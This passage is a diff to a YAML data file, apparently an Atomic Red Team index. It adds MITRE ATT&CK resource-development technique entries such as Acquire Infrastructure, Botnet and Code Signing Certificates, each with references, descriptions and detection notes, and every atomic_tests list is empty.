- - Static File Analysis
+ x_mitre_version: '1.2'
+ atomic_tests: []
+resource-development:
+ T1583:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1583
+ url: https://attack.mitre.org/techniques/T1583
+ - source_name: TrendmicroHideoutsLease
+ description: 'Max Goncharov. (2015, July 15). Criminal Hideouts for Lease:
+ Bulletproof Hosting Services. Retrieved March 6, 2017.'
+ url: https://documents.trendmicro.com/assets/wp/wp-criminal-hideouts-for-lease.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Acquire Infrastructure
+ description: |-
+ Before compromising a victim, adversaries may buy, lease, or rent infrastructure that can be used during targeting. A wide variety of infrastructure exists for hosting and orchestrating adversary operations. Infrastructure solutions include physical or cloud servers, domains, and third-party web services.(Citation: TrendmicroHideoutsLease) Additionally, botnets are available for rent or purchase.
+
+ Use of these infrastructure solutions allows an adversary to stage, launch, and execute an operation. Solutions may help adversary operations blend in with traffic that is seen as normal, such as contact to third-party web services. Depending on the implementation, adversaries may use infrastructure that makes it difficult to physically tie back to them as well as utilize infrastructure that can be rapidly provisioned, modified, and shut down.
+ id: attack-pattern--0458aab9-ad42-4eac-9e22-706a95bafee2
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: resource-development
+ modified: '2020-10-22T17:59:17.606Z'
+ created: '2020-09-30T16:37:40.271Z'
+ x_mitre_version: '1.0'
x_mitre_is_subtechnique: false
+ x_mitre_detection: |-
+ Consider use of services that may aid in tracking of newly acquired infrastructure, such as WHOIS databases for domain registration information. Much of this activity may take place outside the visibility of the target organization, making detection of this behavior difficult.
+
+ Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1583.005:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1583.005
+ url: https://attack.mitre.org/techniques/T1583/005
+ - source_name: Norton Botnet
+ url: https://us.norton.com/internetsecurity-malware-what-is-a-botnet.html
+ description: Norton. (n.d.). What is a botnet?. Retrieved October 4, 2020.
+ - source_name: Imperva DDoS for Hire
+ url: https://www.imperva.com/learn/ddos/booters-stressers-ddosers/
+ description: Imperva. (n.d.). Booters, Stressers and DDoSers. Retrieved October
+ 4, 2020.
+ - source_name: Krebs-Anna
+ description: Brian Krebs. (2017, January 18). Who is Anna-Senpai, the Mirai
+ Worm Author?. Retrieved May 15, 2017.
+ url: https://krebsonsecurity.com/2017/01/who-is-anna-senpai-the-mirai-worm-author/
+ - source_name: Krebs-Bazaar
+ description: Brian Krebs. (2016, October 31). Hackforums Shutters Booter Service
+ Bazaar. Retrieved May 15, 2017.
+ url: https://krebsonsecurity.com/2016/10/hackforums-shutters-booter-service-bazaar/
+ - source_name: Krebs-Booter
+ description: Brian Krebs. (2016, October 27). Are the Days of “Booter” Services
+ Numbered?. Retrieved May 15, 2017.
+ url: https://krebsonsecurity.com/2016/10/are-the-days-of-booter-services-numbered/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Botnet
+ description: 'Before compromising a victim, adversaries may buy, lease, or rent
+ a network of compromised systems that can be used during targeting. A botnet
+ is a network of compromised systems that can be instructed to perform coordinated
+ tasks.(Citation: Norton Botnet) Adversaries may purchase a subscription to
+ use an existing botnet from a booter/stresser service. With a botnet at their
+ disposal, adversaries may perform follow-on activity such as large-scale [Phishing](https://attack.mitre.org/techniques/T1566)
+ or Distributed Denial of Service (DDoS).(Citation: Imperva DDoS for Hire)(Citation:
+ Krebs-Anna)(Citation: Krebs-Bazaar)(Citation: Krebs-Booter)'
+ id: attack-pattern--31225cd3-cd46-4575-b287-c2c14011c074
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: resource-development
+ modified: '2020-10-05T02:15:01.325Z'
+ created: '2020-10-01T00:49:05.467Z'
+ x_mitre_detection: Much of this activity will take place outside the visibility
+ of the target organization, making detection of this behavior difficult. Detection
+ efforts may be focused on related stages of the adversary lifecycle, such
+ as during [Phishing](https://attack.mitre.org/techniques/T1566), [Endpoint
+ Denial of Service](https://attack.mitre.org/techniques/T1499), or [Network
+ Denial of Service](https://attack.mitre.org/techniques/T1498).
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1584.005:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1584.005
+ url: https://attack.mitre.org/techniques/T1584/005
+ - source_name: Norton Botnet
+ url: https://us.norton.com/internetsecurity-malware-what-is-a-botnet.html
+ description: Norton. (n.d.). What is a botnet?. Retrieved October 4, 2020.
+ - source_name: Imperva DDoS for Hire
+ url: https://www.imperva.com/learn/ddos/booters-stressers-ddosers/
+ description: Imperva. (n.d.). Booters, Stressers and DDoSers. Retrieved October
+ 4, 2020.
+ - source_name: Dell Dridex Oct 2015
+ url: https://www.secureworks.com/research/dridex-bugat-v5-botnet-takeover-operation
+ description: Dell SecureWorks Counter Threat Unit Threat Intelligence. (2015,
+ October 13). Dridex (Bugat v5) Botnet Takeover Operation. Retrieved May
+ 31, 2019.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Botnet
+ description: 'Before compromising a victim, adversaries may compromise numerous
+ third-party systems to form a botnet that can be used during targeting. A
+ botnet is a network of compromised systems that can be instructed to perform
+ coordinated tasks.(Citation: Norton Botnet) Instead of purchasing/renting
+ a botnet from a booter/stresser service(Citation: Imperva DDoS for Hire),
+ adversaries may build their own botnet by compromising numerous third-party
+ systems. Adversaries may also conduct a takeover of an existing botnet, such
+ as redirecting bots to adversary-controlled C2 servers.(Citation: Dell Dridex
+ Oct 2015) With a botnet at their disposal, adversaries may perform follow-on
+ activity such as large-scale [Phishing](https://attack.mitre.org/techniques/T1566)
+ or Distributed Denial of Service (DDoS).'
+ id: attack-pattern--810d8072-afb6-4a56-9ee7-86379ac4a6f3
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: resource-development
+ modified: '2020-10-22T18:03:23.751Z'
+ created: '2020-10-01T00:58:35.269Z'
+ x_mitre_detection: Much of this activity will take place outside the visibility
+ of the target organization, making detection of this behavior difficult. Detection
+ efforts may be focused on related stages of the adversary lifecycle, such
+ as during [Phishing](https://attack.mitre.org/techniques/T1566), [Endpoint
+ Denial of Service](https://attack.mitre.org/techniques/T1499), or [Network
+ Denial of Service](https://attack.mitre.org/techniques/T1498).
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1587.002:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1587.002
+ url: https://attack.mitre.org/techniques/T1587/002
+ - url: https://en.wikipedia.org/wiki/Code_signing
+ description: Wikipedia. (2015, November 10). Code Signing. Retrieved March
+ 31, 2016.
+ source_name: Wikipedia Code Signing
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Code Signing Certificates
+ description: |-
+ Before compromising a victim, adversaries may create self-signed code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is.
+
+ Prior to [Code Signing](https://attack.mitre.org/techniques/T1553/002), adversaries may develop self-signed code signing certificates for use in operations.
+ id: attack-pattern--34b3f738-bd64-40e5-a112-29b0542bc8bf
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: resource-development
+ modified: '2020-10-15T01:15:54.945Z'
+ created: '2020-10-01T01:41:08.652Z'
+ x_mitre_detection: Much of this activity will take place outside the visibility
+ of the target organization, making detection of this behavior difficult. Detection
+ efforts may be focused on related follow-on behavior, such as [Code Signing](https://attack.mitre.org/techniques/T1553/002)
+ or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004).
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1588.003:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1588.003
+ url: https://attack.mitre.org/techniques/T1588/003
+ - url: https://en.wikipedia.org/wiki/Code_signing
+ description: Wikipedia. (2015, November 10). Code Signing. Retrieved March
+ 31, 2016.
+ source_name: Wikipedia Code Signing
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Code Signing Certificates
+ description: |-
+ Before compromising a victim, adversaries may buy and/or steal code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is.
+
+ Prior to [Code Signing](https://attack.mitre.org/techniques/T1553/002), adversaries may purchase or steal code signing certificates for use in operations. The purchase of code signing certificates may be done using a front organization or using information stolen from a previously compromised entity that allows the adversary to validate to a certificate provider as that entity. Adversaries may also steal code signing materials directly from a compromised third-party.
+ id: attack-pattern--e7cbc1de-1f79-48ee-abfd-da1241c65a15
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: resource-development
+ modified: '2020-10-22T18:22:21.007Z'
+ created: '2020-10-01T02:11:47.237Z'
+ x_mitre_detection: Much of this activity will take place outside the visibility
+ of the target organization, making detection of this behavior difficult. Detection
+ efforts may be focused on related follow-on behavior, such as [Code Signing](https://attack.mitre.org/techniques/T1553/002)
+ or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004).
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1586:
+ technique:
+ id: attack-pattern--81033c3b-16a4-46e4-8fed-9b030dd03c4a
+ description: "Before compromising a victim, adversaries may compromise accounts
+ with services that can be used during targeting. For operations incorporating
+ social engineering, the utilization of an online persona may be important.
+ Rather than creating and cultivating accounts (i.e. [Establish Accounts](https://attack.mitre.org/techniques/T1585)),
+ adversaries may compromise existing accounts. Utilizing an existing persona
+ may engender a level of trust in a potential victim if they have a relationship,
+ or knowledge of, the compromised persona. \n\nA variety of methods exist for
+ compromising accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598),
+ purchasing credentials from third-party sites, or by brute forcing credentials
+ (ex: password reuse from breach credential dumps).(Citation: AnonHBGary) Prior
+ to compromising accounts, adversaries may conduct Reconnaissance to inform
+ decisions about which accounts to compromise to further their operation.\n\nPersonas
+ may exist on a single site or across multiple sites (ex: Facebook, LinkedIn,
+ Twitter, Google, etc.). Compromised accounts may require additional development,
+ this could include filling out or modifying profile information, further developing
+ social networks, or incorporating photos.\n\nAdversaries may directly leverage
+ compromised email accounts for [Phishing for Information](https://attack.mitre.org/techniques/T1598)
+ or [Phishing](https://attack.mitre.org/techniques/T1566)."
+ name: Compromise Accounts
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1586
+ url: https://attack.mitre.org/techniques/T1586
+ - source_name: AnonHBGary
+ description: 'Bright, P. (2011, February 15). Anonymous speaks: the inside
+ story of the HBGary hack. Retrieved March 9, 2017.'
+ url: https://arstechnica.com/tech-policy/2011/02/anonymous-speaks-the-inside-story-of-the-hbgary-hack/
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: resource-development
+ modified: '2020-10-22T18:05:46.296Z'
+ created: '2020-10-01T01:17:15.965Z'
+ x_mitre_data_sources:
+ - Social media monitoring
+ x_mitre_platforms:
+ - PRE
+ x_mitre_is_subtechnique: false
+ x_mitre_version: '1.0'
+ x_mitre_detection: |-
+ Consider monitoring social media activity related to your organization. Suspicious activity may include personas claiming to work for your organization or recently modified accounts making numerous connection requests to accounts affiliated with your organization.
+
+ Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).
+ atomic_tests: []
+ T1584:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1584
+ url: https://attack.mitre.org/techniques/T1584
+ - url: https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf
+ description: Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage
+ Units. Retrieved July 18, 2016.
+ source_name: Mandiant APT1
+ - source_name: ICANNDomainNameHijacking
+ description: 'ICANN Security and Stability Advisory Committee. (2005, July
+ 12). Domain Name Hijacking: Incidents, Threats, Risks and Remediation. Retrieved
+ March 6, 2017.'
+ url: https://www.icann.org/groups/ssac/documents/sac-007-en
+ - source_name: Talos DNSpionage Nov 2018
+ url: https://blog.talosintelligence.com/2018/11/dnspionage-campaign-targets-middle-east.html
+ description: Mercer, W., Rascagneres, P. (2018, November 27). DNSpionage Campaign
+ Targets Middle East. Retrieved October 9, 2020.
+ - source_name: FireEye EPS Awakens Part 2
+ description: Winters, R.. (2015, December 20). The EPS Awakens - Part 2. Retrieved
+ January 22, 2016.
+ url: https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html
+ - source_name: NSA NCSC Turla OilRig
+ url: https://media.defense.gov/2019/Oct/18/2002197242/-1/-1/0/NSA_CSA_Turla_20191021%20ver%204%20-%20nsa.gov.pdf
+ description: 'NSA/NCSC. (2019, October 21). Cybersecurity Advisory: Turla
+ Group Exploits Iranian APT To Expand Coverage Of Victims. Retrieved October
+ 16, 2020.'
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Compromise Infrastructure
+ description: |-
+ Before compromising a victim, adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, and third-party web services. Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it during other phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: ICANNDomainNameHijacking)(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye EPS Awakens Part 2) Additionally, adversaries may compromise numerous machines to form a botnet they can leverage.
+
+ Use of compromised infrastructure allows an adversary to stage, launch, and execute an operation. Compromised infrastructure can help adversary operations blend in with traffic that is seen as normal, such as contact with high reputation or trusted sites. By using compromised infrastructure, adversaries may make it difficult to tie their actions back to them. Prior to targeting, adversaries may compromise the infrastructure of other adversaries.(Citation: NSA NCSC Turla OilRig)
+ id: attack-pattern--7e3beebd-8bfe-4e7b-a892-e44ab06a75f9
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: resource-development
+ modified: '2020-10-22T18:03:23.937Z'
+ created: '2020-10-01T00:36:30.759Z'
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: false
+ x_mitre_detection: Much of this activity will take place outside the visibility
+ of the target organization, making detection difficult for defenders. Detection
+ efforts may be focused on related stages of the adversary lifecycle, such
+ as during Command and Control.
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1583.002:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1583.002
+ url: https://attack.mitre.org/techniques/T1583/002
+ - source_name: Unit42 DNS Mar 2019
+ url: https://unit42.paloaltonetworks.com/dns-tunneling-how-dns-can-be-abused-by-malicious-actors/
+ description: 'Hinchliffe, A. (2019, March 15). DNS Tunneling: how DNS can
+ be (ab)used by malicious actors. Retrieved October 3, 2020.'
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: DNS Server
+ description: |-
+ Before compromising a victim, adversaries may set up their own Domain Name System (DNS) servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of hijacking existing DNS servers, adversaries may opt to configure and run their own DNS servers in support of operations.
+
+ By running their own DNS servers, adversaries can have more control over how they administer server-side DNS C2 traffic ([DNS](https://attack.mitre.org/techniques/T1071/004)). With control over a DNS server, adversaries can configure DNS applications to provide conditional responses to malware and, generally, have more flexibility in the structure of the DNS-based C2 channel.(Citation: Unit42 DNS Mar 2019)
+ id: attack-pattern--197ef1b9-e764-46c3-b96c-23f77985dc81
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: resource-development
+ modified: '2020-10-19T00:11:26.376Z'
+ created: '2020-10-01T00:40:45.279Z'
+ x_mitre_detection: Much of this activity will take place outside the visibility
+ of the target organization, making detection of this behavior difficult. Detection
+ efforts may be focused on related stages of the adversary lifecycle, such
+ as during Command and Control.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1584.002:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1584.002
+ url: https://attack.mitre.org/techniques/T1584/002
+ - source_name: Talos DNSpionage Nov 2018
+ url: https://blog.talosintelligence.com/2018/11/dnspionage-campaign-targets-middle-east.html
+ description: Mercer, W., Rascagneres, P. (2018, November 27). DNSpionage Campaign
+ Targets Middle East. Retrieved October 9, 2020.
+ - source_name: FireEye DNS Hijack 2019
+ url: https://www.fireeye.com/blog/threat-research/2019/01/global-dns-hijacking-campaign-dns-record-manipulation-at-scale.html
+ description: 'Hirani, M., Jones, S., Read, B. (2019, January 10). Global DNS
+ Hijacking Campaign: DNS Record Manipulation at Scale. Retrieved October
+ 9, 2020.'
+ - source_name: CiscoAngler
+ description: 'Nick Biasini. (2015, March 3). Threat Spotlight: Angler Lurking
+ in the Domain Shadows. Retrieved March 6, 2017.'
+ url: https://blogs.cisco.com/security/talos/angler-domain-shadowing
+ - source_name: Proofpoint Domain Shadowing
+ url: https://www.proofpoint.com/us/threat-insight/post/The-Shadow-Knows
+ description: 'Proofpoint Staff. (2015, December 15). The shadow knows: Malvertising
+ campaigns use domain shadowing to pull in Angler EK. Retrieved October 16,
+ 2020.'
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ description: |-
+ Before compromising a victim, adversaries may compromise third-party DNS servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of setting up their own DNS servers, adversaries may compromise third-party DNS servers in support of operations.
+
+ By compromising DNS servers, adversaries can alter DNS records. Such control can allow for redirection of an organization's traffic, facilitating Collection and Credential Access efforts for the adversary.(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye DNS Hijack 2019) Adversaries may also be able to silently create subdomains pointed at malicious servers without tipping off the actual owner of the DNS server.(Citation: CiscoAngler)(Citation: Proofpoint Domain Shadowing)
+ name: DNS Server
+ id: attack-pattern--c2f59d25-87fe-44aa-8f83-e8e59d077bf5
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: resource-development
+ modified: '2020-10-19T01:22:53.922Z'
+ created: '2020-10-01T00:54:30.869Z'
+ x_mitre_detection: Much of this activity will take place outside the visibility
+ of the target organization, making detection of this behavior difficult. Detection
+ efforts may be focused on related stages of the adversary lifecycle, such
+ as during Command and Control.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1587:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1587
+ url: https://attack.mitre.org/techniques/T1587
+ - url: https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf
+ description: Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage
+ Units. Retrieved July 18, 2016.
+ source_name: Mandiant APT1
+ - source_name: Kaspersky Sofacy
+ description: Kaspersky Lab's Global Research and Analysis Team. (2015, December
+ 4). Sofacy APT hits high profile targets with updated toolset. Retrieved
+ December 10, 2015.
+ url: https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/
+ - source_name: Bitdefender StrongPity June 2020
+ url: https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf
+ description: Tudorica, R. et al. (2020, June 30). StrongPity APT - Revealing
+ Trojanized Tools, Working Hours and Infrastructure. Retrieved July 20, 2020.
+ - source_name: Talos Promethium June 2020
+ url: https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html
+ description: Mercer, W. et al. (2020, June 29). PROMETHIUM extends global
+ reach with StrongPity3 APT. Retrieved July 20, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Develop Capabilities
+ description: |-
+ Before compromising a victim, adversaries may build capabilities that can be used during targeting. Rather than purchasing, freely downloading, or stealing capabilities, adversaries may develop their own capabilities in-house. This is the process of identifying development requirements and building solutions such as malware, exploits, and self-signed certificates. Adversaries may develop capabilities to support their operations throughout numerous phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: Bitdefender StrongPity June 2020)(Citation: Talos Promethium June 2020)
+
+ As with legitimate development efforts, different skill sets may be required for developing capabilities. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's development capabilities, provided the adversary plays a role in shaping requirements and maintains a degree of exclusivity to the capability.
+ id: attack-pattern--edadea33-549c-4ed1-9783-8f5a5853cbdf
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: resource-development
+ modified: '2020-10-22T18:18:08.552Z'
+ created: '2020-10-01T01:30:00.877Z'
+ x_mitre_detection: Much of this activity will take place outside the visibility
+ of the target organization, making detection of this behavior difficult. Detection
+ efforts may be focused on related stages of the adversary lifecycle, such
+ as during Defense Evasion or Command and Control.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1587.003:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1587.003
+ url: https://attack.mitre.org/techniques/T1587/003
+ - source_name: Splunk Kovar Certificates 2017
+ url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
+ description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
+ Certificates. Retrieved October 16, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Digital Certificates
+ description: |-
+ Before compromising a victim, adversaries may create self-signed SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner. In the case of self-signing, digital certificates will lack the element of trust associated with the signature of a third-party certificate authority (CA).
+
+ Adversaries may create self-signed SSL/TLS certificates that can be used to further their operations, such as encrypting C2 traffic (ex: [Web Protocols](https://attack.mitre.org/techniques/T1071/001)) or even enabling [Man-in-the-Middle](https://attack.mitre.org/techniques/T1557) if added to the root of trust (i.e. [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004)).
+ id: attack-pattern--1cec9319-743b-4840-bb65-431547bce82a
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: resource-development
+ modified: '2020-10-22T18:18:08.422Z'
+ created: '2020-10-01T01:42:24.974Z'
+ x_mitre_data_sources:
+ - SSL/TLS certificates
+ x_mitre_detection: |-
+ Consider use of services that may aid in the tracking of certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017)
+
+ Detection efforts may be focused on related behaviors, such as [Web Protocols](https://attack.mitre.org/techniques/T1071/001), [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002), and/or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004).
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1588.004:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1588.004
+ url: https://attack.mitre.org/techniques/T1588/004
+ - description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
+ Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
+ source_name: DiginotarCompromise
+ url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
+ - source_name: Let's Encrypt FAQ
+ url: https://letsencrypt.org/docs/faq/
+ description: Let's Encrypt. (2020, April 23). Let's Encrypt FAQ. Retrieved
+ October 15, 2020.
+ - source_name: Splunk Kovar Certificates 2017
+ url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
+ description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
+ Certificates. Retrieved October 16, 2020.
+ - source_name: Recorded Future Beacon Certificates
+ url: https://www.recordedfuture.com/cobalt-strike-servers/
+ description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
+ Rogue Cobalt Strike Servers. Retrieved October 16, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Digital Certificates
+ description: |-
+ Before compromising a victim, adversaries may buy and/or steal SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner.
+
+ Adversaries may purchase or steal SSL/TLS certificates to further their operations, such as encrypting C2 traffic (ex: [Web Protocols](https://attack.mitre.org/techniques/T1071/001)) or even enabling [Man-in-the-Middle](https://attack.mitre.org/techniques/T1557) if the certificate is trusted or otherwise added to the root of trust (i.e. [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004)). The purchase of digital certificates may be done using a front organization or using information stolen from a previously compromised entity that allows the adversary to validate to a certificate provider as that entity. Adversaries may also steal certificate materials directly from a compromised third-party, including from certificate authorities.(Citation: DiginotarCompromise)
+
+ Certificate authorities exist that allow adversaries to acquire SSL/TLS certificates, such as domain validation certificates, for free.(Citation: Let's Encrypt FAQ)
+
+ Adversaries may register or hijack domains that they will later purchase an SSL/TLS certificate for.
+ id: attack-pattern--19401639-28d0-4c3c-adcc-bc2ba22f6421
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: resource-development
+ modified: '2020-10-22T18:18:54.959Z'
+ created: '2020-10-01T02:14:18.044Z'
+ x_mitre_data_sources:
+ - SSL/TLS certificates
+ x_mitre_detection: |-
+ Consider use of services that may aid in the tracking of newly issued certificates and/or certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Some server-side components of adversary tools may have default values set for SSL/TLS certificates.(Citation: Recorded Future Beacon Certificates)
+
+ Detection efforts may be focused on related behaviors, such as [Web Protocols](https://attack.mitre.org/techniques/T1071/001), [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002), and/or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004).
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1583.001:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1583.001
+ url: https://attack.mitre.org/techniques/T1583/001
+ - external_id: CAPEC-630
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/630.html
+ - source_name: CISA MSS Sep 2020
+ url: https://us-cert.cisa.gov/ncas/alerts/aa20-258a
+ description: 'CISA. (2020, September 14). Alert (AA20-258A): Chinese Ministry
+ of State Security-Affiliated Cyber Threat Actor Activity. Retrieved October
+ 1, 2020.'
+ - source_name: FireEye APT28
+ description: 'FireEye. (2015). APT28: A WINDOW INTO RUSSIA’S CYBER ESPIONAGE
+ OPERATIONS?. Retrieved August 19, 2015.'
+ url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf
+ - source_name: PaypalScam
+ description: Bob Sullivan. (2000, July 24). PayPal alert! Beware the 'PaypaI'
+ scam. Retrieved March 2, 2017.
